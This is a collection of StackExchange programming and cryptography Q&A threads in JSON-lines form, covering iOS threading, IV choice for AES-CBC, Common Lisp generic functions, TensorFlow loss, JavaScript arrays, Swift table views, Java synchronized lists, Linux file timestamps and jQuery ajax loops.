stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n\n[tableView reload]; \/\/ tableView refers to your table view name\n\n}\n<\/code>\nComment: now im getting what i requires but its not calling \"-(UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath\" function.. which is present in nextViewController..\nComment: Check now. Updated my answer. U need to reload the table view once parsing is completed.\nComment: @ Ganapathy : how can i stop os cancel or kill this thread on cancel button? 
i am using \"[NSThread cancelPreviousPerformRequestsWithTarget:self selector:@selector(newMethodForParsing) object:nil];\" but its now working..\nAnswer: Try this\n<code>-(void)viewDidAppear:(BOOL)animated\n{\n [super viewDidAppear:animated];\n [[ImpActivityAgent defaultAgent] makeBusy:YES];\n [self performSelectorInBackground:@selector(start) withObject:Nil];\n \/\/or you can use after delay then no need to use perform selector on main thread in start method.\n [self performSelector:@selector(start) withObject:nil afterDelay:0.5];\n}\n\n-(void)start\n{\n NSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\n htmlData = [NSData dataWithContentsOfURL:loadUrl];\n self.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n [self performSelectorOnMainThread:@selector(parseHTML) withObject:Nil waitUntilDone:YES];\n}\n<\/code>\nAnswer: Try it....\n<code>- (void)viewDidLoad\n{\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view from its nib.\n [NSTimer scheduledTimerWithTimeInterval:1 target:self selector:@selector(newMethodForParsing) userInfo:nil repeats:NO];\n}\n\n-(void)newMethodForParsing\n{\nNSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n}\n<\/code>\nAnswer: Ganapathy's answer leaks memory, you need to place an autoreleasepool inside the method. this is a simpler way to do this. this will run on the main thread but after the existing tasks in the queue.\nIf you want it to run on a different thread replace with <code>dispatch_get_global_queue()<\/code>\n<code>- (void)viewDidLoad\n{\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view from its nib.\n [[ImpActivityAgent defaultAgent] makeBusy:YES];\n\n dispatch_async(dispatch_get_main_queue(), ^{\n\n NSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\n htmlData = [NSData dataWithContentsOfURL:loadUrl];\n self.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n [self parseHTML];\n )\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"slow loading when clicked on table view cell","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it safe to use file's hash as IV?\n\nQuestion: I'm encrypting some files using AES in CBC mode. \nI'm also using file's digest (SHA-1) to check that data is decrypted correctly (so I need to store it with file).\nIs it safe to use this digest as AES's IV and store it in the header of file? Or it has security issue? \nAnswer: By using the file's hash as IV, you also divulge the file's hash. This allows an attacker to make an exhaustive search on the file contents. It is not difficult to imagine situations where there are only a few millions or billions of possible file contents (e.g. the file contents are an encrypted SAN or password), in which case showing the data hash is an intolerable leak.\nWhat you could use as IV is the result of HMAC over the file, using as key the same key than for encryption (or, preferably, derive both the HMAC key and the encryption key with a suitable PRF). 
The result would probably be quite hard to prove secure in any way, so don't do it for production; but it seems like a promising way to achieve context-free deterministic encryption.\n\"Context-free\" means \"without any memory\". Some encryption modes require a random, unpredictable IV, while others just need nonces (e.g. a counter); you can obtain the former from the latter by encrypting the nonces with a block cipher, using a specific secret key for that. A counter still requires a bit of memory, which, depending on the situation, may or may not be easy to obtain. Some embedded systems would have difficulty updating a stored counter (permanent storage update draws a bit of current, a scarce resource on passive RFID systems). Since embedded systems rarely own a reliable source of randomness, they need deterministic encryption. Context-free deterministic encryption is thus an important niche functionality. Using HMAC to compute the IV for encryption may be a way to achieve that (with the important drawback of requiring a first pass on the whole file, before obtaining the IV which is need to begin encrypting it).\nComment: As a side note, if you store the HMAC-derived IV and use it as an authentication token, you do in fact have a provably secure deterministic authentaction scheme (DAE): SIV. (See the DAE paper by Rogaway and Shrimpton.) Of course, barring restrictions like the ones Thomas mentions, a standard (non-deterministic) AE scheme would be better.\nComment: What do you mean by \"seems like a promising way\"? What would be the current best practice for context-free deterministic encryption?\nAnswer: You obviously lose semantic security when you use deterministic encryption. This means an attacker can tell if two files are identical. publishing the unencrypted hash also leaks which file you encrypted, if the attacker knows the hash from elsewhere.\nYou end up with something similar to convergent encryption, which has a few issues. Check the question Is Convergent Encryption really secure? for details. I recommend using this scheme only if you want the properties of convergent encryption. Use a random IV otherwise.\nI also recommend using standard MACs instead of a homebrew SHA-1 construction. When using CBC it's essential to first verify the MAC, and only then attempt to decrypt the message. Else you'll probably vulnerable to padding-oracle attacks.\nThe easiest solution is using authenticated encryption such as AES-GCM with a random IV.\nAnswer: It depends on the mode of operation. With counter mode, predictable IV's are fine. Of course, a collision in file hashes would result in easy plain-text recovery. \nIt's probably better to fill the high order 64-bits with the number of microseconds since the unix epoc, pad the rest of the 64-bits with random numbers and the use the low order 64-bits as the counter. It'd be pretty hard for IVs to collide in that set-up if encrypting stuff on a local PC.\nWith CBC they really need to be randomly selected. Predictable CBC IVs can lead to attacks, as BEAST demonstrated.\nComment: A predictable IV for CBC-mode is mainly a problem when the attacker can do a chosen plaintext attack (adapt the plaintext to the IV). In this case the IV depends on the (full) plaintext, so a chosen plaintext attacker has to try a while to get \"good\" ciphertext-IV combinations. (But I suppose a chosen plaintext attack is not really a problem for a file encryption scheme.)\nComment: I'm using CBC but how file's hash is predictable? 
the attacker doesn't have original file to generate hash!\nAnswer: MS SQL server's \"Always Encrypted\" functionality uses AES-256 CBC, and they derive the IV from a HMAC-SHA256 of some content that includes the database cell to be encrypted as well as the encryption key (as well as some fixed values).\nMS Doc - Data Encryption Algorithm\n<code>When using deterministic encryption: IV = HMAC-SHA-256( iv_key, cell_data ) truncated to 128 bits\niv_key = HMAC-SHA-256(CEK, \"Microsoft SQL Server cell IV key\" + algorithm + CEK_length)\n<\/code>\nSo there is at least some one widely deployed crytosystem taking this approach.\n","meta":{"source":"crypto.stackexchange","title":"Is it safe to use file's hash as IV?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Typed lambda functions in Common Lisp\n\nQuestion: I don't know of any practical uses for this, it just came to my mind whether there is any thing comparable to <code>defmethod<\/code> to <code>defun<\/code> for <code>lambda<\/code>? Something like this\n<code>(defmacro tlambda (args &body body)\n (let* ((gf-name (subseq (write-to-string (gensym)) 2))\n (gf-sym (read-from-string gf-name)))\n `(progn (defmethod ,gf-sym ,args ,@body)\n (prog1 (symbol-function ',gf-sym) (unintern ',gf-sym)))))\n\n(tlambda ((x fixnum))) ;#<STANDARD-GENERIC-FUNCTION #:G759 (1)>\n(funcall (tlambda ((x fixnum)) (* x 2)) 4) ;8\n(funcall (tlambda ((x list)) (second x)) '(a s d f)) ;S\n(funcall (tlambda ((x string)) (string-upcase x)) \"lambda\") ;\"LAMBDA\"\n<\/code>\nAnswer: I do not think that this makes sense in the shape you show. What should happen if the type doesn't match? If you just want to check types, use <code>check-type<\/code>.\n<code>Defmethod<\/code> and <code>defun<\/code> are not really comparable, by the way. <code>Defun<\/code> registers a function, while <code>defmethod<\/code> adds a method to an existing (though maybe implicitly created) generic function. The types that you use in a method definition are used to dispatch (runtime polymorphism) to the right method upon invocation of the generic function. The mechanisms for this dispatch are a bit expensive when constructed, so you probably shouldn't try to do that on the fly (something like a <code>generic-lambda<\/code>) or transiently (something like a <code>method-let<\/code>).\nInstead, use (<code>e<\/code>\/<code>c<\/code>)<code>typecase<\/code> and similar for ad hoc dispatch, and <code>check-type<\/code> for checking types. There are also libraries for pattern-based polymorphism (e. g. optima, trivia), which you could use for more elaborate cases.\nAnswer: I agree with Svante that you probably don't want this. But if you did want it the way you are doing it is very confused: I simply don't understand what you are doing with <code>gf-sym<\/code> and <code>gf-name<\/code> but it represents some quite serious confusion about symbols I think (and is almost certainly unsafe). Instead you could do something like this:\n<code>(defmacro tlambda (&body cases)\n (let* ((gf-name (gensym)))\n `(progn\n ,@(mapcar (lambda (case)\n `(defmethod ,gf-name ,@case))\n cases)\n (symbol-function ',gf-name))))\n<\/code>\nAnd now\n<code>> (let ((l (tlambda\n ((x y) (cons x y))\n ((x (y integer))\n (declare (ignore x)) y))))\n (values (funcall l 'a 'b)\n (funcall l 'a 1)))\n(a . 
b)\n1\n<\/code>\nI'm not sure whether the objects created by <code>tlambda<\/code> can be garbage-collected: it may be they can.\n","meta":{"source":"stackoverflow","title":"Typed lambda functions in Common Lisp","dup_signals":{}},"subset":"stackexchange"} +{"text":"High Loss despite correct Weight and bias -Tensorflow\n\nQuestion: I am a begginer user of tensorflow and am making a program to explain linear regression. I have one input which is the year the house was bought (my program is a house price identifier) and the weight and bias were identical to excel's trendline linear equation. Unfortunately the cost ended at 70.\n<code>import tensorflow as tf\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nfilename = dir_path+ \"\\ActualHousePriceData7.csv\"\n\nlearn_rate=0.001\n\nw=tf.Variable(([1.00]),tf.float32)\nb=tf.Variable(([1.00]),tf.float32)\nx= tf.placeholder(tf.float32)\ny_=tf.placeholder(tf.float32)\n\ninit= tf.global_variables_initializer()\nsess=tf.Session()\nsess.run(init)\n\nall_x1s = []\nall_ys = []\n\nwith tf.Session() as sess:\n sess.run( tf.global_variables_initializer())\n with open(filename) as inf:\n # Skip header\n next(inf)\n for line in inf:\n # Read data, using python, into our features\n housenumber, _x1, _y_= line.strip().split(\",\")\n all_x1s.append(float(_x1))\n all_ys.append(float(_y_))\n\nsess = tf.Session()\nsess.run(init)\ny_pred = (x*w)+ b\nsquared_deltas = tf.square(y_ - y_pred)\ncost = tf.reduce_sum(squared_deltas)\ntrain_step = tf.train.GradientDescentOptimizer(learn_rate).minimize(cost)\n\nprint (all_x1s)\nfor i in range(10000):\n sess.run(train_step, feed_dict={x:all_x1s ,y_:all_ys})\n print(\"After %d iteration:\" % i)\n print(\"W: %f\" % sess.run(w))\n print(\"b: %f\" % sess.run(b))\n print(\"Cost\")\n print(sess.run(cost,feed_dict={x:all_x1s, y_:all_ys}))\n<\/code>\nIs there a problem with how I am outputting the cost or is it something else? Any help would be amazing!\nAnswer: Since you are using <code>squared_loss<\/code>, its recommended to use mean of the loss not sum. \n<code>cost = tf.reduce_mean(squared_deltas)\n<\/code>\n","meta":{"source":"stackoverflow","title":"High Loss despite correct Weight and bias -Tensorflow","dup_signals":{}},"subset":"stackexchange"} +{"text":"To Make alternating array\n\nQuestion: I am learning the basics and I just cannot hack this one:\nThis function will be called with an array and should return a new array containing only the alternate elements starting from index 0. If the array is empty or contains only 1 item, return the original array.\n<code>makeAlternatingArray(['hey', 'hi']);\n\/\/ should return ['hey']\n\nmakeAlternatingArray(['a', 'b', 'c', 'd', 'e']);\n\/\/ should return ['a', 'c', 'e']\n<\/code>\nWhat I got so far is:\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n for (let i=0; i<array.length; i=+2){\n return array[i]\n }\n \n}\n<\/code>\nTop part is correct but by for let statement is wrong. 
I am getting these errors:\nWhen passed an array of multiple elements, function will return an array of alternating items\n\u2715 AssertionError: expected 'a' to deeply equal [ 'a', 'c', 'e' ]\nWhen passed an array of multiple elements, function will return an array of alternating items\n\u2715 AssertionError: expected 100 to deeply equal [ 100, 99, -5 ]\nCan someone help please?\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n for (let i=0; i<array.length; i=+2){\n return array[i]\n }\n \n}\n<\/code>\nComment: `return` exits the function.... So on your for loop it exits. So for a for loop you need to `push` into a new array. Buy you really should just use `filter`\nAnswer: <code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n return array.filter((el, i) => i % 2 === 0);\n}\n<\/code>\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Global_Objects\/Array\/filter\nor\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n let newArray = [];\n for (let i=0; i<array.length; i=+2){\n newArray.push(array[i]);\n }\n return newArray;\n}\n<\/code>\nComment: Thank you for that, can you explain to me \"el\"and \"i\" here? As I didn't learn about this yet want to know what does it stand for so I can use it in future.\nComment: If you look at the link, you'll see that the callback function's first two parameters are `element` and `index`, which I've called `el` and `i`. I didn't need the third parameter, so I didn't declare it.\n","meta":{"source":"stackoverflow","title":"To Make alternating array","dup_signals":{}},"subset":"stackexchange"} +{"text":"PNChart-swift not working\n\nQuestion: I wanna use some charts in my swift project, actually I was using PNChart before, but now I need to move on to PNChart-swift.\nhttps:\/\/github.com\/kevinzhow\/PNChart-Swift\nas the readme saids I added some lines in Podfile, and I \n<code>pod install<\/code>\nthen I get \"no such module PNChart-swift\"\nI think Pod is cloning the wrong Codes from the PNChart-swift repository.\nIs there any way I can clone the codes and use as the library without using Pod?\nThank you.\nAnswer: For manual installation you could just download the repo as zipfile and than drag the .xcodeproj file into your project.\nThis will create the required reference so that you can use it.\nYou may also need to add it as embedded framework in your project settings.\nComment: drag the frameworks .xcodeproj file into your project (you may want to create a group \"frameworks\" or something like that and drop it into this group to keep your project's structure clean :) Also if you drag-and-dropped it into your project you still may need to \"import\" it in the classes where you want to use it.\nComment: You mean I should drag the .xcodeproj directly to xcode, which is opened by project.xcworkspace?\n","meta":{"source":"stackoverflow","title":"PNChart-swift not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift 3 incorrect initial UITableViewCell row height\n\nQuestion: I am trying to programmatically design the layout of my custom UITableView cells. However, I get some strange behavior: despite setting the rowHeight, the first four rows are the default height, and then the rest are what I specified. 
This impacts the design of my cell, because I programmatically lay out labels based in part on the row height.\nI initialize the tableview as follows:\n<code>func gameTableInit() {\n gameTableView = UITableView()\n gameTableView.delegate = self\n gameTableView.dataSource = self\n \n let navFrame = self.navigationController?.view.frame\n gameTableView.frame = CGRect(x: navFrame!.minX, y: navFrame!.maxY, width: self.view.frame.width, height: self.view.frame.height - navFrame!.height - (self.tabBarController?.view.frame.height)!)\n gameTableView.rowHeight = gameTableView.frame.height\/4 \/\/HEIGHT OF TABLEVIEW CELL\n gameTableView.register(GameCell.self, forCellReuseIdentifier: \"cell\")\n \n self.view.addSubview(gameTableView)\n\n}\n<\/code>\nThis is my cellForRowAtIndexPath function:\n<code>func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {\n let cell = tableView.dequeueReusableCell(withIdentifier: \"cell\") as! GameCell\n print(\"height of cell: \\(cell.frame.height)\")\n var game = Game()\n game.awayTeam = \"CLE\"\n game.homeTeam = \"GSW\"\n cell.setUIFromGame(g: game)\n return cell\n}\n<\/code>\nThe print statement prints:\n\nheight of cell: 44.0\nheight of cell: 44.0\nheight of cell: 44.0\nheight of cell: 44.0\n\nAfter some scrolling, it then prints the expected:\n\nheight of cell: 166.75\n...\n\nI have created a custom tableview cell called GameCell\n<code>class GameCell: UITableViewCell {\n\n override func awakeFromNib() {\n super.awakeFromNib()\n \/\/ Initialization code\n \n }\n\n override func setSelected(_ selected: Bool, animated: Bool) {\n super.setSelected(selected, animated: animated)\n \n \/\/ Configure the view for the selected state\n }\n\n override func layoutSubviews() {\n super.layoutSubviews()\n positionUIElements()\n }\n\n override init(style: UITableViewCellStyle, reuseIdentifier: String?) 
{\n super.init(style: style, reuseIdentifier: reuseIdentifier)\n }\n\n required init?(coder aDecoder: NSCoder) {\n fatalError(\"init(coder:) has not been implemented\")\n }\n\n \/\/on left\n var awayTeamAbbrev = UILabel()\n var awayTeamLogo: UIImage!\n\n \/\/on right\n var homeTeamAbbrev = UILabel()\n var homeTeamLogo: UIImage!\n\n func positionUIElements() {\n \/\/away team abbreviation is centered on upper left half of cell\n awayTeamAbbrev.frame = CGRect(x: self.frame.minX, y: self.frame.minY, width: self.frame.midX, height: self.frame.height\/4)\n awayTeamAbbrev.textAlignment = .center\n awayTeamAbbrev.adjustsFontSizeToFitWidth = true\n \/\/awayTeamLogo\n \n \/\/home team abbreviation is centered on upper right half of cell\n homeTeamAbbrev.frame = CGRect(x: self.frame.midX, y: self.frame.minY, width: self.frame.midX, height: self.frame.height\/4)\n homeTeamAbbrev.textAlignment = .center\n homeTeamAbbrev.adjustsFontSizeToFitWidth = true\n \n \/\/homeTeamLogo\n \n self.contentView.addSubview(awayTeamAbbrev)\n self.contentView.addSubview(homeTeamAbbrev)\n }\n\n func setUIFromGame(g: Game) {\n awayTeamAbbrev.text = g.awayTeam!\n homeTeamAbbrev.text = g.homeTeam!\n }\n\n}\n<\/code>\nI have tried many of the suggested answers online like calling layoutIfNeeded, but that didn't work anywhere I tried it.\nAnswer: While accepted answer can help in some cases I would like to share some other ways to fix this issue:\n\nCheck Content Hugging Priority of your cell's components (especially if you're using stack views inside cell)\nIn your cell add:\n<code>override func didMoveToSuperview() {\nsuper.didMoveToSuperview()\nlayoutIfNeeded() \n<\/code>\nAnswer: I found a working solution: In my GameCell class, I overrided layout subviews:\n<code>override func layoutSubviews() {\n super.layoutSubviews()\n self.contentView.layoutIfNeeded()\n positionUIElements()\n self.awayTeamAbbrev.preferredMaxLayoutWidth = self.awayTeamAbbrev.frame.size.width\n self.homeTeamAbbrev.preferredMaxLayoutWidth = self.homeTeamAbbrev.frame.size.width\n}\n<\/code>\nAnswer: 44 is defailt height for UITableViewCell in UITableView, try to override func \n<code>func tableView(tableView: UITableView, heightForRowAtIndexPath indexPath: NSIndexPath) -> CGFloat {\n return UITableViewAutomaticDimension;\n}\n<\/code>\nor return exact value, in your case 166.75\nComment: I want the height of the cell to vary based on the height of the device, so I tried setting the rowHeight member when initializing. However, every row should have the same height, which is why I avoided that function for performance reasons\nComment: Hmmm, I tried this method out of curiosity, and it still didn't work. Strange\nComment: Is that method called? There is option in inicialization of tableview - estimatedRowHeight\nComment: Yep, just verified heightForRow was called. But the behavior is still the same. Perhaps it is an Apple bug? This is my first time creating the tableviewcells completely in swift (usually I use IB), and my first time with this problem\nAnswer: I had the same problem using <code>UITableViewDiffableDataSource<\/code>. The <code>tableView<\/code> set the correct <code>cell<\/code> height after I attempt to scroll manually the content.\nThe <code>tableView<\/code> was inside on an <code>UIViewController<\/code>. 
The <code>dataSource<\/code> was applied on the <code>viewDidLoad<\/code> method.\nI reloaded the <code>tableView<\/code> content using <code>tableView.reloadData()<\/code> inside the <code>viewWillAppear<\/code> and the problem was solve.\n","meta":{"source":"stackoverflow","title":"Swift 3 incorrect initial UITableViewCell row height","dup_signals":{}},"subset":"stackexchange"} +{"text":"java - general synchronizedList question\n\nQuestion: I have a general question regarding synchronized List.\nLets say that in the constructor I am createing a list \n<code>List synchronizedList = Collections.synchronizedList(list);\n<\/code>\nand I have one method adds an object to the list. \n<code>public void add(String s){ \n synchronizedList.add(s)\n}\n<\/code>\nThere is another thread that checks every few seconds if there are a few rows , dump it to a file and deletes them all. \nNow lets say I iterate each row and save it to the db. \nafter all iteration I clear the list. \nHow does the multithread support help me?\nI could add an element to the list just before the clear() in the other thread occurs .\nUnless I manage the lock myself (which I dont realy need a synched list for that ) it myself.\nComment: As all the three answers state, synchronized list means that all the operations on that list are guaranteed to be atomic or guarantee serial access to individual method calls. I had to ask my colleague what is that mean. So it means operations on List like(from above code snippet) `synchronizedList.size()` and `synchronizedList.add(s)` cannot be in parallel. This is not obvious for some people who is reading this thread. So though of adding to help other who dont understand. Thanks @WhiteFang34, @jb-nizet and @khachik for explanations below.\nAnswer: The synchronized list returned by <code>Collections<\/code> won't help in your case. It's only good if you need to guarantee serial access to individual method calls. If you need to synchronize around a larger set of operations, then you need to manually wrap that code in a <code>synchronized<\/code> block. The Javadoc states:\n\nIt is imperative that the user manually synchronize on the returned list when iterating over it.\n\nIf your list is used elsewhere you can at least safeguard it from individual method calls that would otherwise not be thread-safe. If you're entirely managing the list however, you can just add a <code>synchronized<\/code> block to your <code>add<\/code> method and use the same lock that you'll use when iterating over it.\nAnswer: <code>synchronizedList<\/code> indeed only guarantees that every method call on the list is synchronized. If you need multiple operations to be done in a synchronized way, you have to handle the synchronization yourself.\nBTW, this is explicitely said in the javadoc for Collections.synchronizedList : \n\nIt is imperative that the user\n manually synchronize on the returned\n list when iterating over it:\n\n<code> List list = Collections.synchronizedList(new ArrayList());\n ...\n synchronized(list) {\n Iterator i = list.iterator(); \/\/ Must be in synchronized block\n while (i.hasNext())\n foo(i.next());\n }\n<\/code>\nAnswer: synchronized list means that all the operations on that list are guaranteed to be atomic. The scenario you describe requires to have some locking outside the list. Consider semaphores or making <code>synchronized<\/code> block to implement monitors. 
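For example, here is a minimal sketch of a monitor guarding both the producer's <code>add<\/code> and the flushing thread's drain (assuming the usual <code>java.util<\/code> imports; <code>saveToDb<\/code> and <code>BATCH_SIZE<\/code> are hypothetical placeholders for your own persistence step and threshold):
<code>private final List<String> rows = new ArrayList<>();
private static final int BATCH_SIZE = 100;   \/\/ arbitrary threshold for the example

public void add(String s) {
    synchronized (rows) {
        rows.add(s);
    }
}

public void flushIfNeeded() {
    List<String> snapshot;
    synchronized (rows) {            \/\/ no add() can slip in between the copy and the clear
        if (rows.size() < BATCH_SIZE) {
            return;
        }
        snapshot = new ArrayList<>(rows);
        rows.clear();
    }
    saveToDb(snapshot);              \/\/ hypothetical helper; the slow I\/O runs outside the lock
}
<\/code>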
Take a look at java.util.concurrent.\n","meta":{"source":"stackoverflow","title":"java - general synchronizedList question","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pade' approximation\n\nQuestion: Do you know how to enter this equation in Mathematica? It is Pade approximation, Values of p(2,..,7) are also given.\nIs it just simply writing this in Mathematica? or should I do something else?\nComment: Please include Mathematica code that you have tried so far.\nComment: @Syed I haven't. there is `PadeApproximant` in mathematica. but I don't know how to fit this formula to that.\nComment: Do you want to find an approximation to $\\theta$ at the point $T_{\\text{eff}}$ = ?\nComment: @Syed I suppose so\nAnswer: The function posted can be expressed exactly as an order [4\/3] Pad\u00e9 approximant about <code>Teff=0<\/code>.\nSometimes when defining a function with a lot of numeric parameters, it is easier to put in symbolic values <code>{p[2],p[3],...,p[7]}<\/code> first to confirm the function is defined correctly:\n<code>pSymbols = Array[p, 6, 2];\n<\/code>\nYour function sort of looks like $$\\frac{k T_{eff}}{1- k T_{eff}\\left(\\frac{\\mathrm{even \\: P \\: stuff}}{\\mathrm{odd \\:P \\:stuff}}\\right)}$$ Notice there's a pattern in the even and odd $P$ parts in the denominator of your function (there's probably a neater way to write this with <code>Nest<\/code> or <code>Fold<\/code>, I just haven't been able to figure it out yet). In this case, it probably would be easier just to write out the denominator by hand, but this makes sense to do here since there is a clear pattern:\n<code>evenPStuff = pSymbols[[-2]];\nDo[\n evenPStuff *= k*Teff;\n evenPStuff += i;\n , \n{i, pSymbols[[1 ;; -3 ;; 2]] \/\/ Reverse}\n ]\n\noddPStuff = pSymbols[[-1]];\nDo[\n oddPStuff *= k*Teff;\n oddPStuff += i;\n, \n{i, pSymbols[[2 ;; -3 ;; 2]] \/\/ Reverse}\n ]\noddPStuff *= k*Teff;\noddPStuff += 1;\n<\/code>\nwe can now neatly define $\\theta$ (with symbolic values for the parameters $P_n$) as a function of $T_{eff}$ (pasting the output with the symbols as a screenshot so it's easier to look at):\n<code>\\[Theta]Symbolic[Teff_] = (k*Teff)\/(1 - k*Teff*(evenPStuff\/oddPStuff))\n<\/code>\n\nNow let's take the order [4,3] Pad\u00e9 approximant about <code>Teff=0<\/code> of <code>\\[Theta]Symbolic[Teff]<\/code>:\n<code>pade43 = PadeApproximant[\\[Theta]Symbolic[Teff], {Teff, 0, {4, 3}}];\npade43 \/\/ Numerator \/\/ Expand\npade43 \/\/ Denominator \/\/ Expand\n<\/code>\n\n<code>k Teff + k^2 Teff^2 p[3] + k^3 Teff^3 p[5] + k^4 Teff^4 p[7]<\/code>\n\n<code>1 - k Teff p[2] + k Teff p[3] - k^2 Teff^2 p[4] + k^2 Teff^2 p[5] - k^3 Teff^3 p[6] + k^3 Teff^3 p[7]<\/code>\n\nAnd we see this is indeed the same as <code>\\[Theta]Symbolic[Teff]<\/code>:\n<code>pade43 == \\[Theta]Symbolic[Teff] \/\/Simplify\n<\/code>\n\n<code>True<\/code>\n\nWe can also now plug in our numerical parameter values. We can plug them into <code>pade43<\/code> since we know it's the same as <code>\\[Theta]Symbolic[Teff]<\/code> but has a nicer looking form:\n<code>pVals = {-5.9357*10^-2, 2.0165*10^-1, 1.0404*10^-3, \n 2.7621*10^-3, -9.1653*10^-6, 9.8305*10^-7};\n\\[Theta][Teff_] = pade43 \/. AssociationThread[pSymbols -> pVals]\n<\/code>\n\n<code>(k Teff + 0.20165 k^2 Teff^2 + 0.0027621 k^3 Teff^3 + 9.8305*10^-7 k^4 Teff^4)\/(1 + 0.261007 k Teff + 0.0017217 k^2 Teff^2 + 0.0000101484 k^3 Teff^3)<\/code>\nComment: Thank you very much for your invaluable response. 
\nso if i just enter the last line: `(k Teff + 0.20165 k^2 Teff^2 + 0.0027621 k^3 Teff^3 + 9.8305*10^-7 k^4 Teff^4)\/(1 + 0.261007 k Teff + 0.0017217 k^2 Teff^2 + 0.0000101484 k^3 Teff^3)`\nin my code, that would be enough?\nComment: @lia Yes (if all that you need to do is enter a definition for `\\[Theta][Teff]` )\nComment: ok Thanks a lot for your time\n","meta":{"source":"mathematica.stackexchange","title":"Pade' approximation","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to store file creation time in linux\n\nQuestion: Is there any way to store file creation time in linux? May be filesystem that supports that. I mean CREATION TIME not mtime or ctime.\nComment: What is the difference between \"CREATION TIME\" and ctime?\nComment: @Paul: ctime is the metadata change time.\nComment: @Paul: http:\/\/www.kavoir.com\/2009\/04\/linux-the-differences-between-file-times-atime-accessed-time-ctime-changed-time-and-mtime-modified-time.html\nComment: Well, 99.9% of the files on my systems have never have a chmod or chown since they were created, so ctime is fine for those cases.\nComment: @Paul: ctime includes content modification. It just *also* includes chmod\/chown, while mtime does not.\nComment: Ok, I guess it's lucky I've never cared about ctime because I never knew it included content modification.\nAnswer: Most (all?) Linux filesystems do not store the time when the file was created. Instead, they just store when the file was last modified, when it was last accessed, and when it last had an administrative action applied to it (e.g., changing its permissions). Of those, the best approximation to what you're looking for is usually the modification time.\nComment: @t0ster: HFS and HFS+ support creation time. ext2\/3\/4 does not.\nComment: On OS X there is way to get creation time of the file as well as ctime and mtime. I thought may be on linux too.\nComment: Accroding to this resource http:\/\/www.qa.com\/about-qa\/blogs\/2010\/july\/creation-time-in-unix-yes---in-ext4 ext4 has such parameter as `crtime`, but it is not easy to work with (yet).\nComment: It seems the link in the last comment was wrong (or got obsoleted). 
The working link is http:\/\/www.qa.com\/about-qa\/blogs\/2010\/july\/creation-time-in-unix-yes-in-ext4\/.\nAnswer: I do believe that Ext4 has creation time support.\nTry this debugfs: \n<code>debugfs -R 'stat <inode>' \/dev\/block_dev.\n\nFragment: Address: 0 Number: 0 Size: 0\nctime: 0x51872d50:df6167a0 -- Mon May 6 07:10:56 2013\natime: 0x5183b4e1:d2ad63cc -- Fri May 3 16:00:17 2013\nmtime: 0x51872d50:df6167a0 -- Mon May 6 07:10:56 2013\ncrtime: 0x5183b4e1:d2ad63cc -- Fri May 3 16:00:17 2013\n<\/code>\nUnderstanding EXT4 (Part 2): Timestamps\nAnswer: On NTFS using ntfs-3g you can access the creation time via an extended attribute (see <code>attr(5)<\/code>).\nComment: It's an option, but don't want to have deal with NTFS on linux.\nComment: Well, your other option is HFS, and you *really* don't want to deal with HFS on Linux.\nAnswer: If you want to store file creation times, you can use filesystem event notification tool like inotify.\nIt has system calls that make you aware of IN_CREATE (a file creation event) or some other event, When a file creation event happens you can simply log that with current time in a file of your preference.\nComment: It's also an option, I'll take a look.\n","meta":{"source":"stackoverflow","title":"How to store file creation time in linux","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to do ajax request and html element update in background?\n\nQuestion: I have html form with three elements - buttons start and stop and text area. Once start button is pressed, I would like to do multiple ajax requests and once result is received to update the text area, once stop is pressed, processing of ajax requests should be stopped.\nI tried to do something like below:\n<code>$(document).ready(function(){\n var inProgress = false;\n\n $(\"#stop\").click(function() {\n inProgress = false;\n });\n\n $(\"#start\").click(function() {\n inProgress = true;\n while (inProgress) {\n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n });\n }\n });\n<\/code>\nBut it doesn't work as expected - browser tab hangs. What is wrong with my code?\nComment: `while (inProgress)` never stops. You need to `poll` for the `inProgress` change!\nComment: your browser is stuck in never ending loop\nComment: what is your actual requirement?\nAnswer: Don't use while loop. You should do it in an asynchoronous way: At the end of .done function, put another asynchronous ajax call.\n<code>\/\/ other stuff goes here\n\nfunction doRequest() {\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n\n if (inProgress) doRequest();\n });\n}\n\n$(\"#start\").click(function() {\n inProgress = true;\n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n doRequest();\n});\n<\/code>\nAnswer: Well, since $.ajax is asynchronous by default, you are making a loooot of XHR (ajax calls) ! 
